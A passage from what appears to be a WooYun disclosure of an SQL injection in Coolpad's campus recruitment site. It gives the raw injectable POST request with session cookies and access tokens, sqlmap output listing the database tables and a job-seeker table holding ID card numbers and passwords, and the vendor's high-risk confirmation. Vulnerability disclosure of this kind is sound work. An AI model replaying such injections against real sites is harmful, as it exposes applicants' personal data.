Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7Dfield_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989

POST /index.php?c=submitResumes&f=saveConnectInfo HTTP/1.1

Host: campus.coolpad.com

Proxy-Connection: keep-alive

Content-Length: 164

Accept: application/json, text/javascript, */*; q=0.01

Origin: http://campus.coolpad.com

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2438.3 Safari/537.36

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

Referer: http://campus.coolpad.com/index.php?c=submitResumes&f=resumePreview&act=edit

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.8

Cookie: Hm_lvt_cf573ba5889953becfec5b2e08d9160d=1436762927; Hm_lpvt_cf573ba5889953becfec5b2e08d9160d=1436765094; CP_SW_U_Id=cad54902-25ab-4807-b4f6-b9e3ce88e7b5_17wff3; W_CP_T_Id=dt9_1747fb190b-6b19-4213-8a6c-1f85887146e5s1sr; nTalk_CACHE_DATA={uid:kf_9926_ISME9754_guest9C383A1B-A989-99,tid:1436762887533458}; NTKF_T2D_CLIENTID=guest9C383A1B-A989-9977-49BF-7C23C030791A; pgv_pvi=530273280; pgv_si=s2191045632; U_T=null; rememberUserNickName=32564674; isHasLogin=true; shopCart=""; glanceOverGoods=""; Hm_lvt_ed4dc0af212843677141159d85428e45=1436762877,1436768984; Hm_lpvt_ed4dc0af212843677141159d85428e45=1436768988; OZ_1U_1844=vid=v5a342fd662eea.0&ctime=1436768987&ltime=1436768984; OZ_1Y_1844=erefer=http%3A//www.yulong.com/product/product/product/load.html%3FproductBO.product.id%3D6040%26productBO.menuId%3D30&eurl=http%3A//www.coolpad.com/&etime=1436768984&ctime=1436768987&ltime=1436768984&compid=1844; Hm_lvt_384596db34f6f9312806bd8ba87b7dc5=1436762878,1436768985; Hm_lpvt_384596db34f6f9312806bd8ba87b7dc5=1436768988; isMobile=n; datas=%7B%22publish%22%3A%7B%22history%22%3A%5B%22%5C%2Findex.php%3Fc%3DsubmitResumes%26f%3DresumePreview%26act%3Dedit%22%5D%2C%22uid%22%3A32564674%2C%22rtncode%22%3A%220%22%2C%22openid%22%3A%2232564674%22%2C%22expires_in%22%3A%227776000%22%2C%22refresh_token%22%3A%222.e63a865568bd9e287f9f34bef92decc0%22%2C%22access_token%22%3A%222.00534006a7ec55a120825a9584f4cfbb.9185d4279dcfcd5abbe2f50ca80513f4.1436773923100%22%2C%22sex%22%3A%221%22%2C%22email%22%3A%22dongdongxuehei%40163.com%22%2C%22nickname%22%3A%22test%22%2C%22brithday%22%3A%221990-4-5%22%2C%22rtn_code%22%3A%220%22%2C%22headIconUrl%22%3A%22http%3A%5C%2F%5C%2Ffile.coolyun.com%5C%2Fgroup6%5C%2FM06%5C%2FEF%5C%2F1D%5C%2FwKgFFlWjQm-IV6LSAAAAPFVQDX8AAt9pwA9-zoAAABU437.jpg%3Fmethod%3Dgenerate%26type%3Dcrop%26width%3D256%26height%3D256%26quality%3D80%26access_token%3D101CVoAUsqc4DdqemSia8RWgznJq%252FbHKgUmZw%253D%253D%26source%3Dheadimg%26d%3D32564674%26method%3Ddownload%22%2C%22mobile%22%3A%22%22%7D%7Dfield_coolyunid=32564674*&cont%5Bfield_tel%5D=15099999999&cont%5Bfield_email%5D=sddsa%40qq.com&cont%5Bfield_address%5D=&cont%5Bfield_emergency_number%5D=15988880989

交给sqlmap

Database: coolpadjobdb<br>
[35 tables]<br>
+---------------------------------+<br>
| clp_college                     |<br>
| clp_college_department          |<br>
| clp_count_position              |<br>
| clp_department                  |<br>
| clp_department_managers         |<br>
| clp_hiring                      |<br>
| clp_hiring_employ               |<br>
| clp_hiring_first                |<br>
| clp_hiring_second               |<br>
| clp_lecture                     |<br>
| clp_managers                    |<br>
| clp_managers_area               |<br>
| clp_position                    |<br>
| clp_position_city               |<br>
| clp_position_interviewarea      |<br>
| clp_position_type               |<br>
| clp_position_workarea           |<br>
| clp_preach_plan                 |<br>
| clp_province                    |<br>
| clp_ranks                       |<br>
| clp_recruit_area                |<br>
| clp_recruitment_dynamics        |<br>
| clp_seekers                     |<br>
| clp_seekers_active              |<br>
| clp_seekers_audition            |<br>
| clp_seekers_behave              |<br>
| clp_seekers_connection          |<br>
| clp_seekers_education           |<br>
| clp_seekers_family_relationship |<br>
| clp_seekers_practice_experience |<br>
| clp_seekers_project_experience  |<br>
| clp_seekers_self_evaluation     |<br>
| clp_seekers_skills_hobbies      |<br>
| statistics_datas                |<br>
| statistics_status               |<br>
+---------------------------------+

Database: coolpadjobdb

[35 tables]

+---------------------------------+

| clp_college |

| clp_college_department |

| clp_count_position |

| clp_department |

| clp_department_managers |

| clp_hiring |

| clp_hiring_employ |

| clp_hiring_first |

| clp_hiring_second |

| clp_lecture |

| clp_managers |

| clp_managers_area |

| clp_position |

| clp_position_city |

| clp_position_interviewarea |

| clp_position_type |

| clp_position_workarea |

| clp_preach_plan |

| clp_province |

| clp_ranks |

| clp_recruit_area |

| clp_recruitment_dynamics |

| clp_seekers |

| clp_seekers_active |

| clp_seekers_audition |

| clp_seekers_behave |

| clp_seekers_connection |

| clp_seekers_education |

| clp_seekers_family_relationship |

| clp_seekers_practice_experience |

| clp_seekers_project_experience |

| clp_seekers_self_evaluation |

| clp_seekers_skills_hobbies |

| statistics_datas |

| statistics_status |

+---------------------------------+

Database: coolpadjobdb<br>
Table: clp_seekers<br>
[38 columns]<br>
+----------------------------+--------------------------------------------------<br>
----------------------+<br>
| Column                     | Type<br>
                      |<br>
+----------------------------+--------------------------------------------------<br>
----------------------+<br>
| coolyun_uid                | int(9)<br>
                      |<br>
| s_address                  | varchar(420)<br>
                      |<br>
| s_before_colloge_residence | varchar(45)<br>
                      |<br>
| s_birthday                 | timestamp<br>
                      |<br>
| s_card_type                | enum('idcard','other')<br>
                      |<br>
| s_edit_date                | datetime<br>
                      |<br>
| s_email                    | varchar(24)<br>
                      |<br>
| s_emergency_contact        | varchar(72)<br>
                      |<br>
| s_emergency_contact_tel    | varchar(18)<br>
                      |<br>
| s_emergency_number         | varchar(42)<br>
                      |<br>
| s_eng_rank_goal            | varchar(12)<br>
                      |<br>
| s_eng_rank_type            | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',<br>
'TEM8','BEC','CATTI') |<br>
| s_expect_graduation        | timestamp<br>
                      |<br>
| s_graduation_time          | datetime<br>
                      |<br>
| s_health                   | enum('better','nice','bad')<br>
                      |<br>
| s_height                   | int(4)<br>
                      |<br>
| s_iconb                    | varchar(420)<br>
                      |<br>
| s_icons                    | varchar(420)<br>
                      |<br>
| s_id                       | int(8)<br>
                      |<br>
| s_idcard                   | varchar(20)<br>
                      |<br>
| s_living_city              | varchar(45)<br>
                      |<br>
| s_marital_status           | enum('married','unmarried','divorce','secret')<br>
                      |<br>
| s_name                     | varchar(72)<br>
                      |<br>
| s_nation                   | varchar(32)<br>
                      |<br>
| s_origin_palce             | varchar(128)<br>
                      |<br>
| s_other_eng_rank_goal      | varchar(12)<br>
                      |<br>
| s_other_eng_rank_type      | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',<br>
'TEM8','BEC','CATTI') |<br>
| s_other_lang_rank          | varchar(300)<br>
                      |<br>
| s_password                 | varchar(32)<br>
                      |<br>
| s_photo                    | varchar(300)<br>
                      |<br>
| s_political_status         | enum('members','party','other')<br>
                      |<br>
| s_portrait                 | varchar(360)<br>
                      |<br>
| s_realname                 | varchar(24)<br>
                      |<br>
| s_save_date                | datetime<br>
                      |<br>
| s_sex                      | enum('lady','gentleman')<br>
                      |<br>
| s_tel                      | varchar(18)<br>
                      |<br>
| s_wechat                   | varchar(24)<br>
                      |<br>
| s_weight                   | int(4)<br>
                      |<br>
+----------------------------+--------------------------------------------------<br>
----------------------+

Database: coolpadjobdb

Table: clp_seekers

[38 columns]

+----------------------------+--------------------------------------------------

----------------------+

| Column | Type

|

+----------------------------+--------------------------------------------------

----------------------+

| coolyun_uid | int(9)

|

| s_address | varchar(420)

|

| s_before_colloge_residence | varchar(45)

|

| s_birthday | timestamp

|

| s_card_type | enum('idcard','other')

|

| s_edit_date | datetime

|

| s_email | varchar(24)

|

| s_emergency_contact | varchar(72)

|

| s_emergency_contact_tel | varchar(18)

|

| s_emergency_number | varchar(42)

|

| s_eng_rank_goal | varchar(12)

|

| s_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',

'TEM8','BEC','CATTI') |

| s_expect_graduation | timestamp

|

| s_graduation_time | datetime

|

| s_health | enum('better','nice','bad')

|

| s_height | int(4)

|

| s_iconb | varchar(420)

|

| s_icons | varchar(420)

|

| s_id | int(8)

|

| s_idcard | varchar(20)

|

| s_living_city | varchar(45)

|

| s_marital_status | enum('married','unmarried','divorce','secret')

|

| s_name | varchar(72)

|

| s_nation | varchar(32)

|

| s_origin_palce | varchar(128)

|

| s_other_eng_rank_goal | varchar(12)

|

| s_other_eng_rank_type | enum('CET4','CET6','PETS','IELTS','TOFEL','TEM4',

'TEM8','BEC','CATTI') |

| s_other_lang_rank | varchar(300)

|

| s_password | varchar(32)

|

| s_photo | varchar(300)

|

| s_political_status | enum('members','party','other')

|

| s_portrait | varchar(360)

|

| s_realname | varchar(24)

|

| s_save_date | datetime

|

| s_sex | enum('lady','gentleman')

|

| s_tel | varchar(18)

|

| s_wechat | varchar(24)

|

| s_weight | int(4)

|

+----------------------------+--------------------------------------------------

----------------------+

这表示是什么，我不知道，自及看吧！

漏洞证明：

坐在这里写这么多，就不能给个20，上一个给低，这样真的好么？

修复方案：

给个高20rank可好？

漏洞回应

厂商回应：

危害等级：高

漏洞Rank：12

确认时间：2015-07-1409:58

厂商回复：

您好，我们秉着公平公正的原则，依据漏洞发现难度、利用难度、造成的危害程度对漏洞做出较中肯的评价，感谢您对酷派安全的关注。

评价

2010-01-01 00:00 http://www.wooyun.org/corps/江苏苏宁易购电子商务有限公司白帽子 | Rank:0 漏洞数:0)
大牛边拿卡边发洞哈。
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)
@江苏苏宁易购电子商务有限公司你是刚才发购物卡的帅哥，@@
2010-01-01 00:00 DloveJ 白帽子 | Rank:731 漏洞数:64)
@江苏苏宁易购电子商务有限公司挖了个你们的洞，没审核呢